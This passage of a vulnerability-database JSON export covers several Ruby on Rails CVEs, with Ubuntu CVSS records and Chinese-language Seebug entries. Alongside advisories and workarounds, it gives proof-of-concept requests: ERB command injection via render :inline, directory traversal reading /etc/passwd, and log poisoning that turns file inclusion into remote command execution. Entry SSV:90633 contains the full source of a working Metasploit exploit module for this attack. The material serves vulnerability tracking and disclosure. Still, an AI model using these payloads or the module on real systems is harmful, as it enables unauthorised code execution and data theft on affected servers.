{"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 7.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.4}, "published": "2016-04-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-2098", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-2098"], "modified": "2016-04-07T00:00:00", "id": "UB:CVE-2016-2098", "href": "https://ubuntu.com/security/CVE-2016-2098", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-04T14:12:55", "description": "actionpack/lib/action_dispatch/http/mime_type.rb in Action Pack in Ruby on\nRails before 3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before\n4.2.5.1, and 5.x before 5.0.0.beta1.1 does not properly restrict use of the\nMIME type cache, which allows remote attackers to cause a denial of service\n(memory consumption) via a crafted HTTP Accept header.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0751", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0751"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2016-0751", "href": "https://ubuntu.com/security/CVE-2016-0751", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2022-08-04T14:12:54", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before\n3.2.22.1, 4.0.x and 4.1.x before 4.1.14.1, 4.2.x before 4.2.5.1, and 5.x\nbefore 5.0.0.beta1.1 allows remote attackers to read arbitrary files by\nleveraging an application's unrestricted use of the render method and\nproviding a .. 
(dot dot) in a pathname.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2016-02-16T00:00:00", "type": "ubuntucve", "title": "CVE-2016-0752", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-0752"], "modified": "2016-02-16T00:00:00", "id": "UB:CVE-2016-0752", "href": "https://ubuntu.com/security/CVE-2016-0752", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2022-08-04T14:09:12", "description": "Cross-site scripting (XSS) vulnerability in Action View in Ruby on Rails\n3.x before 3.2.22.3, 4.x before 4.2.7.1, and 5.x before 5.0.0.1 might allow\nremote attackers to inject arbitrary web script or HTML via text declared\nas \"HTML safe\" and used as attribute values in tag handlers.\n\n#### Bugs\n\n * <http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=834155>\n\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for 
transition; The rails package contains actual code from vivid onward \n[mdeslaur](<https://launchpad.net/~mdeslaur>) | The GnuPG project used this CVE number by mistake when doing an announcement. The GnuPG issue is actually CVE-2016-6313.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2016-09-07T00:00:00", "type": "ubuntucve", "title": "CVE-2016-6316", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-6313", "CVE-2016-6316"], "modified": "2016-09-07T00:00:00", "id": "UB:CVE-2016-6316", "href": "https://ubuntu.com/security/CVE-2016-6316", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "seebug": [{"lastseen": "2017-11-19T12:16:55", "description": "Possible Information Leak Vulnerability in Action View.\r\n\r\nThere is a possible directory traversal and information leak vulnerability in\r\nAction View. This was meant to be fixed on CVE-2016-0752. However the 3.2 patch was not covering\r\nall the scenarios. 
This vulnerability has been assigned the CVE identifier\r\nCVE-2016-2097.\r\n\r\nVersions Affected: 3.2.x, 4.0.x, 4.1.x\r\nNot affected: 4.2+\r\nFixed Versions: 3.2.22.2, 4.1.14.2\r\n\r\nImpact\r\n------\r\nApplications that pass unverified user input to the `render` method in a\r\ncontroller may be vulnerable to an information leak vulnerability.\r\n\r\nImpacted code will look something like this:\r\n\r\n```ruby\r\ndef index\r\n render params[:id]\r\nend\r\n```\r\n\r\nCarefully crafted requests can cause the above code to render files from\r\nunexpected places like outside the application's view directory, and can\r\npossibly escalate this to a remote code execution attack.\r\n\r\nAll users running an affected release should either upgrade or use one of the\r\nworkarounds immediately.\r\n\r\nReleases\r\n--------\r\nThe FIXED releases are available at the normal locations.\r\n\r\nWorkarounds\r\n-----------\r\nA workaround to this issue is to not pass arbitrary user input to the `render`\r\nmethod. 
Instead, verify that data before passing it to the `render` method.\r\n\r\nFor example, change this:\r\n\r\n```ruby\r\ndef index\r\n render params[:id]\r\nend\r\n```\r\n\r\nTo this:\r\n\r\n```ruby\r\ndef index\r\n render verify_template(params[:id])\r\nend\r\n\r\nprivate\r\ndef verify_template(name)\r\n # add verification logic particular to your application here\r\nend\r\n```\r\n\r\nCredits\r\n-------\r\nThanks to both Jyoti Singh and Tobias Kraze from makandra for reporting this and working with us in the patch!", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "seebug", "title": "Ruby on Rails Action View \u4fe1\u606f\u6cc4\u6f0f", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-0752", "CVE-2016-2097"], "modified": "2016-03-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91076", "id": "SSV:91076", "sourceData": "", "sourceHref": "", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-11-19T12:16:55", "description": "### \u6f0f\u6d1e\u5e94\u7528 \r\n\u6d4b\u8bd5\u73af\u5883:Rails-4.0.13 (Ruby-2.1.5) \r\n\r\n\u6d4b\u8bd5\u7cfb\u7edf:Kali Linux 2.0\r\n\r\n\u521b\u5efa Rails \u5e94\u7528:\r\n```\r\n rails new cve-2016-2098 \r\n cd cve-2016-2098\r\n ```\r\n\u4f7f\u7528\u81ea\u5e26\u547d\u4ee4\u521b\u5efa\u63a7\u5236\u5668 vuln \u8def\u7531 index,\u5e76\u4fee\u6539\u5176\u8def\u7531\u9ed8\u8ba4\u5904\u7406\u4ee3\u7801:\r\n```\r\nrails generate scaffold User name:string desc:text age:integer \r\nrake db:migrate\r\n```\r\n\u4fee\u6539 app/controllers/users_controller.rb \u4e2d index \u51fd\u6570\u4ee3\u7801\u4e3a:\r\n```\r\nclass UsersController < ApplicationController ...\r\ndef show\r\nrender :inline => params[:q]\r\nend ...\r\n# def set_user # ..\r\n# end\r\nend\r\n```\r\n\u542f\u52a8\u5e94\u7528\u8bbf\u95ee \r\n```http://*.*.*.*:3000/users/<%25=%20`id`%20%25>```\u65f6,\u4ee3 \u7801\u4f1a\u5c06\r\n```\u201c<%= `id` %>\u201d```\u505a\u4e3a\u6a21\u677f :inline 
\u6e32\u67d3\u7684\u65b9\u5f0f\u5c06\u4f20\u5165\u7684\u5b57\u7b26\u4e32\u4f5c\u4e3a\u6a21 \u677f\u5185\u5bb9\u8fdb\u884c\u6e32\u67d3,\u56e0\u4e3a\u5728 Rails \u6a21\u677f\u5f15\u64ce\u4e2d,<%= [string_here] %> \u8868\u793a\u5c06\r\n[string_here] \u4f5c\u4e3a Ruby \u4ee3\u7801\u8fdb\u884c\u6267\u884c\u5e76\u5c06\u7ed3\u679c\u8fdb\u884c\u8fd4\u56de,\u6240\u4ee5\u6700\u7ec8\u8bbf\u95ee\u9875\r\n\u9762\u4f1a\u8fd4\u56de\u7cfb\u7edf\u6267\u884c id \u547d\u4ee4\u540e\u7684\u7ed3\u679c:\r\n\r\n### \u6f0f\u6d1e\u5f71\u54cd\r\n\u4ece zoomeye.org \u4e0a\u641c\u7d22\u4f7f\u7528\u4e86 Rails \u6846\u67b6\u7684\u7ad9\u70b9:\r\n\r\n\r\n\u5168\u7403\u5927\u7ea6\u6709 4w \u591a\u4e2a\u4f7f\u7528\u4e86 Rails \u7684\u7ad9\u70b9\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n\r\n\u540c\u65f6\u4e5f\u53ef\u4ee5\u5728 Github \u4e0a\u641c\u7d22 \u201crender :inline =>\u201d\u6765\u67e5\u770b\u6f5c\u5728\u53d7\u5230\u5f71\u54cd \u7684\u9879\u76ee:\r\n\r\n\r\n\r\n\u53ef\u4ee5\u770b\u5230\u4e5f\u6709\u5927\u91cf\u7684\u9879\u76ee\u7b26\u5408\u8fd9\u6837\u7684\u4ee3\u7801\u5199\u6cd5,\u53ef\u80fd\u53d7\u5230\u8be5\u6f0f\u6d1e\u7684\u5f71\u54cd\u3002\r\n### \u76f8\u5173\u94fe\u63a5\uff1a\r\n\r\n[1] http://weblog.rubyonrails.org/2016/2/29/Rails-4-2-5-2-4-1-14-2-3-2-22-2-have-been-released/\r\n\r\n[2] https://groups.google.com/d/msg/rubyonrails-security/ly-IH-fxr_Q/WLoOhcMZIAAJ\r\n\r\n[3] https://github.com/rails/rails/compare/v4.2.5.1...v4.2.5.2", "cvss3": {}, "published": "2016-03-17T00:00:00", "type": "seebug", "title": "Ruby on Rails Action Pack\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2098"], "modified": "2016-03-17T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-91073", "id": "SSV:91073", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-11-19T12:18:41", "description": 
"\u5982\u679c\u4f60\u7684\u5e94\u7528\u7a0b\u5e8f\u4f7f\u7528\u7684\u52a8\u6001\u6a21\u7248\u8def\u5f84 (\u4f8b\u5982: `render params[:id]`) \u90a3\u4e48\u4f60\u7684\u7a0b\u5e8f\u5c06\u4f1a\u5b58\u5728\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e. \u8bf7\u628a\u4f60\u7684 Rails \u5347\u7ea7\u5230\u6700\u65b0\u7248\u672c, \u6216\u8005\u91cd\u6784\u4f60\u7684 `controllers`\u3002\r\n\r\n\u6211\u4eec\u5c06\u5c55\u793a\u5982\u4f55\u5728\u7279\u5b9a\u73af\u5883\u4e0b\u4f7f\u7528\u4ee3\u7801\u6267\u884c\u548c\u672c\u5730\u5305\u542b\u6f0f\u6d1e\u53bb\u653b\u51fb Ruby on Rails \u3002\r\nRails\u7684\u63a7\u5236\u5668\u6709\u5305\u542b\u6307\u5b9a\u6e32\u67d3\u6587\u4ef6\u7684\u529f\u80fd\uff0c\u4e3e\u4e2a\u4f8b\u5b50, \u5f53\u6211\u4eec\u8c03\u7528 show \u65b9\u6cd5\u7684\u65f6\u5019\uff0c\u5982\u679c\u6ca1\u6709\u5b9a\u4e49\u5176\u4ed6\u6e32\u67d3\u65b9\u6cd5\uff0c\u8be5\u6846\u67b6\u5c06\u4f1a\u9690\u85cf\u6e32\u67d3 `show.html.erb` \u6587\u4ef6\u3002\r\n\r\n> \u5728\u7edd\u5927\u591a\u6570\u60c5\u51b5\u4e0b\uff0c\u5f00\u53d1\u8005\u4f1a\u8f93\u51fa\u4e0d\u540c\u7684\u683c\u5f0f\uff0c\u4f8b\u5982\uff1a\u6587\u672c, JSON, XML \u6216\u8005\u5176\u4ed6\u4efb\u4f55\u683c\u5f0f\uff0c\u6216\u8005\u67e5\u770b\u4e00\u4e2a\u6587\u4ef6, \u5728\u8fd9\u79cd\u60c5\u51b5\u4e0b, \u5c31\u4f1a\u4f7f\u7528\u4e00\u4e2a\u53ef\u4ee5\u52a8\u6001\u6e32\u67d3\u7684\u6a21\u7248\u8bed\u8a00\uff0c\u4f8b\u5982 ERB, HAML, \u6216\u8005\u5176\u4ed6\u7684\u4ec0\u4e48. \u4f46\u662f\u6709\u51e0\u79cd\u65b9\u6cd5\u53ef\u4ee5\u4fee\u6539\u4ed6\u4eec\u5c55\u793a\u7684\u5185\u5bb9, \u5bf9\u6211\u4eec\u6765\u8bf4\uff0c\u6211\u4eec\u53ea\u8981\u76ef\u7740\u6e32\u67d3\u7684\u65b9\u6cd5\u5c31\u597d\u4e86. 
The Rails \u7684\u6587\u6863\u5b9a\u4e49\u4e86\u51e0\u79cd\u6e32\u67d3\u6a21\u7248\u548c\u5b9a\u4e49\u5185\u5bb9\u7684\u65b9\u6cd5 , \u5305\u62ec\u6307\u5b9a\u6a21\u7248\u7684\u8def\u5f84\u7684 `file:` \u53c2\u6570\u3002\r\n\r\n\r\n\u5982\u679c\u4f60\u5df2\u7ecf\u9605\u8bfb\u8fc7[\u89e3\u51b3\u65b9\u6cd5\u7684\u6587\u6863](http://guides.rubyonrails.org/layouts_and_rendering.html)\uff0c\u4f46\u662f\u4e0d\u786e\u5b9a\u4f60\u9700\u4e0d\u9700\u8981\u8fd9\u6837\u7684\u529f\u80fd\u2014\u2014\u5b9e\u9645\u4e0a\u5e76\u4e0d\u6b62\u4f60\u4e00\u4e2a\u4eba\u5b58\u5728\u8fd9\u6837\u7684\u7591\u60d1\u3002\u90a3\u4e48\u5148\u8ba9\u6211\u4eec\u770b\u770b\u4e0b\u9762\u8fd9\u6bb5\u4ee3\u7801:\r\n\r\n```\r\ndef show\r\n render params[:template]\r\nend\r\n```\r\n\r\n\u8fd9\u4e2a\u4ee3\u7801\u770b\u8d77\u6765\u4f3c\u4e4e\u5f88\u7b80\u5355,\u4f46\u662f\u8c01\u4e5f\u60f3\u4e0d\u5230\u4e00\u4e2a\u63a7\u5236\u5668\u53ea\u662f\u4e3a\u4e86\u6e32\u67d3\u6a21\u7248, \u4ed6\u5b9a\u4e49\u4e86\u4e00\u4e2a `template` \u53c2\u6570. \u4f46\u662f\u4ed6\u6ca1\u6709\u88ab\u8fc7\u6ee4\u8fc7, \u7136\u540e Rails \u5c31\u4f1a\u53bb\u627e\u6307\u5b9a\u7684\u6a21\u7248. , \u4f46\u662f\u8fd9\u4e2a\u6a21\u7248\u5728\u54ea\u5462?\u662f views \u76ee\u5f55\uff0c\u8fd8\u662f\u6839\u76ee\u5f55\uff0c\u53c8\u6216\u8005\u662f\u5176\u4ed6\u76ee\u5f55? \u96be\u9053\u4ed6\u662f\u671f\u5f85\u4e00\u4e2a\u6a21\u677f\u6587\u4ef6\u540d\uff0c\u6216\u8005\u662f\u4e00\u4e2a\u7279\u6b8a\u540e\u7f00\u7684\u6587\u4ef6\u540d \uff0c\u8fd8\u662f\u8bf4\u4e00\u4e2a\u5b8c\u6574\u7684\u8def\u5f84? 
Let's carry these open questions forward and keep exploring.\r\n\r\n<br>\r\n\r\n### Answers\r\n\r\n**The dynamic render mechanism is the best example of using one function to solve a great many problems. That is exactly where its problem lies.**\r\n\r\nLet us assume the render mechanism reads files from the path `app/views/user/#{params[:template]}`, which seems a reasonable idea. If we set the template parameter to dashboard, it will load `app/views/user/dashboard.{ext}`, where .ext is a whitelisted extension (such as .html, .haml, .html.erb, etc.).\r\n\r\nNow consider what happens if we set template to `../admin/dashboard`. What result will it return to us? That is hard to know in advance, but when we tried it, it reported a missing template.\r\n\r\nAnalysing the error message shows that it tries to find the file in `RAILS_ROOT/app/views`, `RAILS_ROOT` and the system root directory. This is a little baffling: why would it look in the system root directory for the template file we need?\r\n\r\n> On a hacker's instinct, I set the parameter to `/etc/passwd`, and we did indeed read the `passwd` file. This is a major finding.\r\n\r\nSince we can read the `passwd` file, can we also read the application's source code and configuration files? Let us set the parameter to `config/initializers/secrettoken.rb` and see.\r\n\r\n> Do not forget what causes this vulnerability: it comes from choosing to set the template path dynamically.\r\n\r\n```\r\ndef show\r\n  render params[:template]\r\nend\r\n```\r\n\r\n> This is only a short and simple piece of code, yet it is enough to cause this vulnerability. I believe quite a few developers write it this way, but this is still not the worst part.\r\n\r\nFrom Jeff Jarmoc's paper \"[The Anatomy of a Rails Vulnerability \u2013 CVE-2014-0130: From Directory Traversal to Shell,](http://matasano.com/research/AnatomyOfRailsVuln-CVE-2014-0130.pdf)\" we learn that a vulnerability like this can be used to obtain remote code execution.\r\n\r\nJeff's paper describes a similar flaw in certain versions of Rails: Rails' implicit render mechanism allowed directory traversal or, more precisely, **local file inclusion**. This is a vulnerability caused by developers.\r\n\r\n> Before digging deeper into this vulnerability, consider that what we have now is **local file inclusion**, not directory traversal. The advantage this gives us is that we can **load executable files (ERB)**. Traditionally, directory traversal can only return the contents of non-executable files, such as CSV files. So in essence we can not only read the application's source code and system files, we can also execute Ruby code, which is quite something. Because we can execute Ruby code, we can run system commands with the same privileges as the web server.\r\n\r\nTo get from file inclusion to code execution we use a technique called log poisoning. Every request in the current environment, including its parameters, is written to a log file (for example `development.log`). Although it is a plain-text file, a log can still contain Ruby code.
Sending a request with valid Ruby code as a parameter is enough to accomplish this.\r\n\r\nIn the example below we send a legitimate request to the web application, passing a URL-encoded ``<%= `ls` %>`` in the fake parameter.\r\n\r\nInspecting the log file, we can see an entry with the URL-decoded parameter. It is valid Ruby code, and it will be executed when the web application renders the log file.\r\n\r\nWe can then use the file inclusion vulnerability to include the log that contains that request, and the parameter is executed.\r\n\r\nWhen the response comes back, we can see that the value of the fake parameter has been replaced by the output of the `ls` command. Other commands can be executed in the same way.\r\n\r\n<br>\r\n\r\n### Conclusion\r\n\r\nWithout digging into the details or actively attempting an exploit, the Rails render mechanism is mysterious and hard to understand. Unfortunately, the Rails reference documentation is not much help in this respect.\r\n\r\nAs with CVE-2014-0130, using dynamic template rendering leads to directory traversal and code execution. I have seen this vulnerability more than once in many open-source Rails projects. If you have not yet read Jeff Jarmoc's paper, I recommend reading it first; it digs deeply into the vulnerability behind CVE-2014-0130 and its impact assessment.\r\n\r\nThis is the msf module I wrote that can detect and exploit the vulnerability described in this article: https://gist.github.com/forced-request/5158759a6418e6376afb\r\n\r\n> The Chinese translation above comes from: https://www.92aq.com/2016/01/27/ruby-on-rails-%E8%BF%9C%E7%A8%8B%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C.html\r\n> Original English article: https://nvisium.com/blog/2016/01/26/rails-dynamic-render-to-rce-cve-2016-0752/\r\n\r\n\r\n<br>\r\n\r\n### Timeline\r\n\r\n* 1 February 2015: the vulnerability was discovered\r\n* 10 February 2015: the Rails team decided to fix the vulnerability\r\n* 13 July 2015: the vulnerability was confirmed without public disclosure (5 months after it was first reported)\r\n* 25 January 2016: the patch for the vulnerability was officially released and the vulnerability was assigned a CVE (nearly 5 months to confirm the vulnerability, nearly 1 year to fix it)\r\n* 27 January 2016: Seebug catalogued the vulnerability\r\n\r\n<br/>\r\n\r\n### Proof of Vulnerability\r\n\r\n**Vulnerable application**\r\n\r\nTest environment: Rails-4.1.5 (Ruby-2.1.5)\r\nTest system: Kali Linux 2.0\r\n\r\nCreate the Rails application:\r\n\r\n```\r\nrails new cve-2016-0752\r\ncd cve-2016-0752\r\n```\r\n\r\nUse the built-in generator to create the controller `vuln` with the route `index`, then modify the route's default handler code:\r\n\r\n```\r\nrails generate controller vuln index\r\n```\r\n\r\nChange the `index` method in `app/controllers/vuln_controller.rb` to:\r\n\r\n```\r\nclass VulnController < ApplicationController\r\n  def index\r\n    render params[:q]\r\n  end\r\nend\r\n```\r\n\r\nAfter starting the application, when `http://192.168.199.205:3000/vuln/index?q=/etc/passwd` is requested, the code passes `/etc/passwd` to the render function as the template to render. When looking for template files, render includes the system root path by default, so when `/etc/passwd` cannot be found in the application's default template directories it goes on to look for `//etc/passwd`. If `//etc/passwd` is accessible, the application renders the file's contents as a template:\r\n\r\n**Executing commands with the help of the access log**\r\n\r\nThe Rails application file log/development.log stores the user access log. As shown in 2.1, the path of the rendered template file can already be controlled; with the access log, the content of the rendered template can be controlled as well. With the Rails template engine, inserting the template element ``<%= `ifconfig` %>`` into the template content means that the result of the ifconfig system command is returned as rendered content.\r\n\r\nRequesting ``http://192.168.199.205:3000/vuln/index?q=<%25=%20`ifconfig`%20%25>`` leaves an entry in log/development.log:\r\n\r\nThen, by making log/development.log the rendered template file, the target host's network information is returned in the page result, `http://192.168.199.205:3000/vuln/index?q=../../log/development.log`:\r\n\r\n### Impact\r\n\r\nSearching zoomeye.org for sites that use the Rails framework:\r\n\r\nWorldwide, about **120,000** sites using Rails **may** be affected by this vulnerability.\r\n\r\nYou can also search GitHub for `render params` to see potentially affected projects:\r\n\r\nA large number of projects also match this coding pattern and may be affected by this vulnerability.", "cvss3": {}, "published": "2016-01-27T00:00:00", "type": "seebug", "title": "Rails Dynamic Render Remote Command Execution Vulnerability (CVE-2016-0752)", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0130", "CVE-2016-0752"], "modified": "2016-01-27T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-90633", "id": "SSV:90633", "sourceData": "\n require 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n @@trav_string = '%5c%2e%2e%2f'\r\n\r\n include Msf::Exploit::Remote::HttpClient\r\n\r\n def initialize(info = {})\r\n super(update_info(info,\r\n 'Name' => 'Ruby on Rails Dynamic Render Directory Traversal + Code Exec',\r\n 'Description' => %q{\r\n This module exploits a remote code execution vulnerability in the explicit render\r\n method when leveraging user parameters.\r\n This module has been tested across multiple versions of RoR 3.x and RoR 4.x\r\n The technique used by this module requires the specified endpoint to be using\r\n dynamic render paths, such as the following example:\r\n def show\r\n render params[:id]\r\n end\r\n },\r\n 'Author' =>\r\n [\r\n 'John Poulin (forced-request)'\r\n ],\r\n 'License' => MSF_LICENSE,\r\n 'Platform' => 'ruby',\r\n 'Arch' => ARCH_CMD,\r\n 'Payload' => \r\n {\r\n 'Compat' =>\r\n {\r\n 'PayloadType' => 'cmd',\r\n 'RequiredCmd' => 'generic perl telnet'\r\n }\r\n },\r\n 'Privileged' => true,\r\n 'Targets' =>\r\n [\r\n [ 'CMD',\r\n {\r\n 'Arch' => ARCH_CMD,\r\n 'Platform' => 'unix'\r\n }\r\n ]\r\n ],\r\n 'DefaultTarget' => 0))\r\n\r\n register_options(\r\n [\r\n Opt::RPORT(80),\r\n OptString.new('URIPATH', [ true, 'The path to the vulnerable route', \"/user\"]),\r\n OptString.new('LOGFILE', [ true, 'The environment\\'s log file', 
'log%2fdevelopment%2elog']),\r\n OptEnum.new('HTTP_METHOD', [true, 'HTTP Method', 'GET', ['GET', 'POST', 'PUT'] ]),\r\n OptString.new('COOKIES', [ false, 'HTTP headers, including auth headers and cookies', ''])\r\n ], self.class)\r\n end\r\n\r\n def vuln\r\n desired_location = 'Gemfile'\r\n\r\n # Initial payload\r\n p = desired_location\r\n\r\n # Search for depth up to 10 to detect if server is vuln\r\n 11.times do |i|\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n\r\n # Check if response contains Gemfile info\r\n if res.body.match(/^gem /)\r\n @depth = i\r\n print_good(\"It appears that this application is vulnerable\")\r\n return true\r\n end\r\n\r\n # Prepare next payload\r\n p = @@trav_string + p\r\n end\r\n return false\r\n end\r\n\r\n def send_payload\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n p = p + \"?p=%3c%25%20%60\" + CGI::escape(payload.encoded) + \"%60%25%3e\"\r\n print_status(\"Sending payload: #{p}\")\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n def render_log\r\n p = datastore['LOGFILE']\r\n (@depth).times do |i|\r\n p = @@trav_string + p\r\n end\r\n\r\n res = send_request_cgi({\r\n 'uri' => normalize_uri(datastore['URIPATH'], p),\r\n 'method' => datastore['HTTP_METHOD'],\r\n 'cookie' => datastore['COOKIES']\r\n }, 60)\r\n end\r\n\r\n #\r\n # Send the actual request\r\n #\r\n def exploit\r\n print_status(\"Sending initial request to detect exploitability\")\r\n\r\n # Check if vulnerable\r\n if vuln\r\n print_status(\"Attempting to exploit\")\r\n \r\n send_payload\r\n else\r\n print_error(\"Application does not appear vulnerable\")\r\n end\r\n end\r\nend\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-90633", "cvss": 
{"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "cve": [{"lastseen": "2023-02-09T14:06:31", "description": "Directory traversal vulnerability in Action View in Ruby on Rails before 3.2.22.2 and 4.x before 4.1.14.2 allows remote attackers to read arbitrary files by leveraging an application's unrestricted use of the render method and providing a .. (dot dot) in a pathname. NOTE: this vulnerability exists because of an incomplete fix for CVE-2016-0752.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2016-04-07T23:59:00", "type": "cve", "title": "CVE-2016-2097", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": 